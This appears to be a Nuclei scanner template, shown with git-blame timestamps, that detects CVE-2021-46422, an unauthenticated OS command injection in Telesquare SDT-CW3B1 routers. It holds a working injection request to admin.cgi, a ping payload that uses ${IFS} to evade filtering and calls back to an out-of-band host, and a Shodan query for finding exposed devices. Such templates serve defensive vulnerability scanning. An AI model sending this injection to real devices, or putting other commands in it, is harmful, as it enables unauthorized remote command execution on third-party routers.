2022-05-18 08:01:57 +00:00
id : CVE-2021-46422
info :
2022-05-18 20:58:07 +00:00
name : SDT-CW3B1 1.1.0 - OS Command Injection
2022-05-27 05:22:24 +00:00
author : badboycxcc,prajiteshsingh
2022-05-18 08:55:27 +00:00
severity : critical
description : |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
2022-05-18 08:40:28 +00:00
reference :
2022-05-18 08:01:57 +00:00
- https://www.exploit-db.com/exploits/50936
2022-05-18 20:58:07 +00:00
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
2022-05-18 21:10:42 +00:00
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
2022-05-18 08:01:57 +00:00
classification :
2022-05-18 08:55:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-05-18 08:01:57 +00:00
cve-id : CVE-2021-46422
2022-05-18 08:55:27 +00:00
cwe-id : CWE-78
2023-04-12 10:55:48 +00:00
epss-score : 0.94686
2022-05-18 08:40:28 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-05-19 18:21:49 +00:00
shodan-query : html:"SDT-CW3B1"
2023-06-04 08:13:42 +00:00
verified : true
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,telesquare,rce,router,injection,edb
2022-05-18 08:40:28 +00:00
variables :
2022-05-27 05:22:24 +00:00
cmd : "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"
2022-05-18 08:01:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-18 08:01:57 +00:00
- method : GET
path :
2022-05-18 08:40:28 +00:00
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
2022-05-18 08:01:57 +00:00
2022-05-27 05:22:24 +00:00
matchers-condition : and
2022-05-18 08:01:57 +00:00
matchers :
2022-05-27 05:22:24 +00:00
- type : word
2022-05-18 08:01:57 +00:00
part : body
2022-05-27 05:22:24 +00:00
words :
- "<CmdResult>"
- type : word
part : interactsh_protocol
name : http
words :
- "dns"
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/18